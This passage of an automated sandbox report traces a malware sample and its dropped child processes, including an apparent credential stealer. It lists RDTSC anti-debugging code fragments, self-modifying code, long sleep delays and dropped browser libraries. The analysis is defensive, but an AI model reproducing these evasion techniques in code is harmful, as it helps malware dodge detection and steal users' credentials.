Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51C036A second address: 51C03C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 1BCAh 0x00000007 mov bx, 2A96h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jmp 00007F4540B7FD1Ah 0x00000014 mov dword ptr [esp], ebp 0x00000017 pushad 0x00000018 mov bl, ah 0x0000001a pushad 0x0000001b movsx ebx, cx 0x0000001e pushfd 0x0000001f jmp 00007F4540B7FD22h 0x00000024 sub cx, 11E8h 0x00000029 jmp 00007F4540B7FD1Bh 0x0000002e popfd 0x0000002f popad 0x00000030 popad 0x00000031 mov ebp, esp 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 jmp 00007F4540B7FD1Bh 0x0000003b push eax 0x0000003c pop ebx 0x0000003d popad 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51C03C6 second address: 51C045E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45412F2585h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push FFFFFFFEh 0x0000000b jmp 00007F45412F257Eh 0x00000010 push 36081ED3h 0x00000015 jmp 00007F45412F2581h 0x0000001a xor dword ptr [esp], 4147DECBh 0x00000021 jmp 00007F45412F257Eh 0x00000026 push 4F020F55h 0x0000002b pushad 0x0000002c jmp 00007F45412F2587h 0x00000031 call 00007F45412F2588h 0x00000036 pushad 0x00000037 popad 0x00000038 pop eax 0x00000039 popad 0x0000003a add dword ptr [esp], 28449EABh 0x00000041 pushad 0x00000042 pushad 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51C045E second address: 51C0464 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51C0464 second address: 51C0476 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr fs:[00000000h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51C0476 second address: 51C047A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51C047A second address: 51C047E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51C047E second address: 51C0484 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51C0484 second address: 51C04BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45412F2584h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop esi 0x0000000f jmp 00007F45412F2589h 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51C04BC second address: 51C0512 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, ebx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F4540B7FD26h 0x00000010 nop 0x00000011 jmp 00007F4540B7FD20h 0x00000016 sub esp, 1Ch 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c pushfd 0x0000001d jmp 00007F4540B7FD1Ch 0x00000022 sbb si, F748h 0x00000027 jmp 00007F4540B7FD1Bh 0x0000002c popfd 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51C0512 second address: 51C0550 instructions: 0x00000000 rdtsc 0x00000002 movzx eax, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushfd 0x00000009 jmp 00007F45412F257Bh 0x0000000e sub si, 998Eh 0x00000013 jmp 00007F45412F2589h 0x00000018 popfd 0x00000019 mov di, si 0x0000001c popad 0x0000001d popad 0x0000001e xchg eax, ebx 0x0000001f pushad 0x00000020 mov edi, esi 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51C0550 second address: 51C05A8 instructions: 0x00000000 rdtsc 0x00000002 mov bx, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push eax 0x00000009 pushad 0x0000000a mov edx, 0A78B24Ch 0x0000000f pushfd 0x00000010 jmp 00007F4540B7FD25h 0x00000015 adc ah, 00000026h 0x00000018 jmp 00007F4540B7FD21h 0x0000001d popfd 0x0000001e popad 0x0000001f xchg eax, ebx 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F4540B7FD28h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51C05A8 second address: 51C05B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45412F257Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51C05B7 second address: 51C05F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F4540B7FD1Fh 0x00000009 sub esi, 0F5477BEh 0x0000000f jmp 00007F4540B7FD29h 0x00000014 popfd 0x00000015 push esi 0x00000016 pop edx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, esi 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51C05F6 second address: 51C0605 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45412F257Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51C0605 second address: 51C0630 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 47AA84DAh 0x00000008 mov dx, 14A6h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 jmp 00007F4540B7FD1Ch 0x00000015 xchg eax, esi 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F4540B7FD1Ah 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51C0630 second address: 51C0636 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51C0636 second address: 51C063C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51C063C second address: 51C0640 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51C0640 second address: 51C0710 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, edi 0x00000009 jmp 00007F4540B7FD24h 0x0000000e push eax 0x0000000f pushad 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F4540B7FD27h 0x00000017 sbb eax, 74B2A1EEh 0x0000001d jmp 00007F4540B7FD29h 0x00000022 popfd 0x00000023 pushfd 0x00000024 jmp 00007F4540B7FD20h 0x00000029 add esi, 34362168h 0x0000002f jmp 00007F4540B7FD1Bh 0x00000034 popfd 0x00000035 popad 0x00000036 call 00007F4540B7FD28h 0x0000003b pushfd 0x0000003c jmp 00007F4540B7FD22h 0x00000041 sub ecx, 60DA5EF8h 0x00000047 jmp 00007F4540B7FD1Bh 0x0000004c popfd 0x0000004d pop ecx 0x0000004e popad 0x0000004f xchg eax, edi 0x00000050 push eax 0x00000051 push edx 0x00000052 jmp 00007F4540B7FD22h 0x00000057 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51C0710 second address: 51C0722 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F45412F257Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51C0722 second address: 51C0749 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4540B7FD1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [7751B370h] 0x00000010 pushad 0x00000011 mov ax, C61Bh 0x00000015 popad 0x00000016 xor dword ptr [ebp-08h], eax 0x00000019 pushad 0x0000001a pushad 0x0000001b mov dx, BAFCh 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51C0749 second address: 51C0779 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 call 00007F45412F257Bh 0x0000000a mov dx, si 0x0000000d pop esi 0x0000000e popad 0x0000000f xor eax, ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F45412F2587h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51C0779 second address: 51C077F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51C077F second address: 51C07C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45412F257Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c jmp 00007F45412F2586h 0x00000011 push eax 0x00000012 jmp 00007F45412F257Bh 0x00000017 nop 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b call 00007F45412F257Bh 0x00000020 pop ecx 0x00000021 mov eax, edx 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51C07C6 second address: 51C07EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop ebx 0x00000005 mov ecx, 5B188D13h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d lea eax, dword ptr [ebp-10h] 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F4540B7FD20h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51C07EA second address: 51C07F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51C07F0 second address: 51C0801 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4540B7FD1Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51C0801 second address: 51C0805 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51C0805 second address: 51C0818 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr fs:[00000000h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51C0818 second address: 51C0844 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F45412F2584h 0x0000000a and ecx, 71E04928h 0x00000010 jmp 00007F45412F257Bh 0x00000015 popfd 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51C0844 second address: 51C088E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4540B7FD29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+08h] 0x0000000c jmp 00007F4540B7FD1Eh 0x00000011 mov eax, dword ptr [esi+10h] 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F4540B7FD27h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51C088E second address: 51C0976 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F45412F257Fh 0x00000009 jmp 00007F45412F2583h 0x0000000e popfd 0x0000000f call 00007F45412F2588h 0x00000014 pop ecx 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 test eax, eax 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F45412F2587h 0x00000021 sub eax, 5629F7EEh 0x00000027 jmp 00007F45412F2589h 0x0000002c popfd 0x0000002d pushad 0x0000002e call 00007F45412F257Eh 0x00000033 pop esi 0x00000034 mov edx, 10077026h 0x00000039 popad 0x0000003a popad 0x0000003b jne 00007F45B3551977h 0x00000041 pushad 0x00000042 movsx edx, si 0x00000045 jmp 00007F45412F2584h 0x0000004a popad 0x0000004b sub eax, eax 0x0000004d jmp 00007F45412F2581h 0x00000052 mov dword ptr [ebp-20h], eax 0x00000055 jmp 00007F45412F257Eh 0x0000005a mov ebx, dword ptr [esi] 0x0000005c push eax 0x0000005d push edx 0x0000005e push eax 0x0000005f push edx 0x00000060 jmp 00007F45412F257Ah 0x00000065 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51C0976 second address: 51C097A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51C097A second address: 51C0980 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51B0E12 second address: 51B0E47 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4540B7FD21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f call 00007F4540B7FD28h 0x00000014 pop ecx 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51B0E47 second address: 51B0E4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51B0E4D second address: 51B0E51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51B0E51 second address: 51B0E7B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45412F257Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F45412F2587h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51B0E7B second address: 51B0EDB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F4540B7FD1Fh 0x00000009 and esi, 7628C28Eh 0x0000000f jmp 00007F4540B7FD29h 0x00000014 popfd 0x00000015 call 00007F4540B7FD20h 0x0000001a pop ecx 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e mov ebp, esp 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F4540B7FD23h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51B0EDB second address: 51B0EE1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51B0EE1 second address: 51B0EE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51B0EE7 second address: 51B0EEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51B0EEB second address: 51B0EEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51B0EEF second address: 51B0F13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F45412F2589h 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 21E936 second address: 21E944 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b push edx 0x0000000c pop edx 0x0000000d pop ebx 0x0000000e rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 86E990 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 86E8BC instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: A244C8 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: AAA3EA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: 21E990 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: 21E8BC instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: 3D44C8 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: 45A3EA instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe	Memory allocated: 2DE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe	Memory allocated: 2F70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe	Memory allocated: 4F70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 31A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 3350000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 31D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Memory allocated: 1360000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Memory allocated: 2E40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Memory allocated: 1360000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe	Memory allocated: 2B90000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe	Memory allocated: 2D50000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe	Memory allocated: 4D50000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Memory allocated: C10000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Memory allocated: 27F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Memory allocated: 47F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000241001\build.exe	Memory allocated: 15D0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000241001\build.exe	Memory allocated: 3180000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000241001\build.exe	Memory allocated: 2ED0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Memory allocated: 900000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Memory allocated: 1A4B0000 memory reserve \| memory write watch
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Memory allocated: D10000 memory reserve \| memory write watch
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Memory allocated: 1AAC0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000284001\crypted.exe	Memory allocated: 1530000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000284001\crypted.exe	Memory allocated: 31A0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000284001\crypted.exe	Memory allocated: 51A0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 1040000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 2950000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 4A90000 memory reserve \| memory write watch
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Memory allocated: B90000 memory reserve \| memory write watch
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Memory allocated: 1A6A0000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Local\Temp\1000283001\channel3.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_052201ED rdtsc

0_2_052201ED

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\1000241001\build.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 180000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\1000284001\crypted.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 1075	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 1223	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 1180	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 1257	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Window / User API: threadDelayed 3151	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Window / User API: threadDelayed 6491	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Window / User API: threadDelayed 1735
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Window / User API: threadDelayed 4039
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Window / User API: threadDelayed 403

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000228001\Setup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\service123.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file
